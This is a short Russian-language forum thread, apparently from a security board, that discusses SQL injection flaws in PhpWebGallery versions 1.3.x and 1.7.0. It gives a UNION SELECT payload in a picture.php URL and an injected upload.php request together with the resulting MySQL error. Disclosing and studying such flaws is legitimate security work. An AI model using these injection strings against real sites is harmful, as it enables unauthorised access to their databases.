![]() |
PhpWebGallery
PhpWebGallery blind sql injection
upload.php PHP код:
|
а кстати какая версия? я там тоже пару скулей видел, 1.3.4 и скорее всего ранние (покрайней мере в 1.3.2 точно есть)
типа такого: Код:
picture.php?cat=27&image_id=1+union+select+1,2,4,5,5,6,7,8,9,10,11,12,13,14/*&expand=27 |
Цитата:
Заменил в коде upload.php в указанном мной месте POST на REQUEST чтобы через GET проканало. Вот результат. http://test2.ru/phpwebgallery-1.7.0/upload.php?submit&waiting_id=1' select file from phpwebgallery_waiting where id = 1\'; [mysql error 1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 А вообще, инъекция работает и при magic_quotes on blackybr: молодец.. у меня не работало =) |
Я с пол-,год назад находил этот баг , на милворм не приняли тк нужен эксплоит а писать было лень. |
-PhpWebGallery 1.3.4 sql injection
-Уязвимость находится в параметре "cat" сценарием picture . Цитата:
|
| Время: 17:46 |